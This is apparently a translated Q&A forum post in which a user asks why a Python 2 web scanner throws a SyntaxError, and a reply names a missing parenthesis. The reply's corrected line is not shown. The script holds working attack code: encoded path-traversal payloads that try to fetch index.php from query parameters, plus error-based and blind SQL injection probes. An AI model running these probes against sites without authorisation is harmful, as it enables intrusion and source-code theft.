我正在尝试编写一个简单的web应用程序。这个应用程序是一个扫描仪。这是我的密码:
import os, sys, urllib2, re, urlparse
l = []
n_l = []
b_l = []
def url(url):
if not url.startswith('http://'):
url = 'http://'+url
else:
url = url
return url
def get_links(url):
try:
res = urllib2.urlopen(url)
print 'Loading ',url
print 'Status ',res.getcode()
string = res.read()
for link in re.findall(r'href=[\'"]?([^\'" >]+)', string):
if not link.startswith('http://'):
link = urlparse.urljoin(url, link)
else:
link = link
l.append(link)
except Exception, e:
print str(e)
def transvers(app):
for rl in l:
if '?' and '=' in rl:
rl = rl.split('=')[0]+'='
rl = rl + app
print 'Download Index.php from %s'%rl
try:
fi_le = urllib2.urlopen(rl)
output = open('index.php','a')
output.write(fi_le.read())
output.close()
except Exception, exceptions:
print str(exceptions)
def sql_url():
for c in l:
if '=' in c:
if c.endswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')):
n_l.append(c+"'")
b_l.append(c+' AND 1 = 0')
def sql_test():
for inj in n_l:
responz = urllib2.urlopen(inj).read()
print 'Trying SQL injection in %s'%inj
if 'error in your SQL syntax' in responz:
print 'SQL BUG FOUND IN %s'%inj
else:
print 'SQL bug not found in %s'%inj
def blind_injection():
for blnd in b_l:
rspn = urllib2.urlopen(blnd).read()
print 'Opening ......... %s'%blnd
rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read()
print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
print 'Comparing output'
if rspn == rsp:
print 'Blind SQL injection bug not found in %s'%blnd
else:
print 'BLIND SQL IJECTION BUG FOUND IN %s'%blnd
def main():
ins = url(sys.argv[1])
get_links(ins)
col = ['../index.php', '%2e%2e%2findex,php', '%2e%2e/index.php', '..%2findex.php', '%2e%2e%5cindex.php', '%2e%2e\index.php', '..%5cindex.php','%252e%252e%255cindex.php', '..%255cindex.php','..%c0%afindex.php','..%c1%9cindex.php']
for h in col:
transvers(h)
sql_url()
sql_test()
blind_injection()
main()
除了blind_injection()
函数外,其他一切都正常。这将返回错误
File "dt.py", line 57
print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
^
SyntaxError: invalid syntax
如何解决此错误?你知道吗
有paren问题,在
[0]
之后缺少一个结束paren,这是导致错误的原因,而不是print语句:应该是:
相关问题 更多 >
编程相关推荐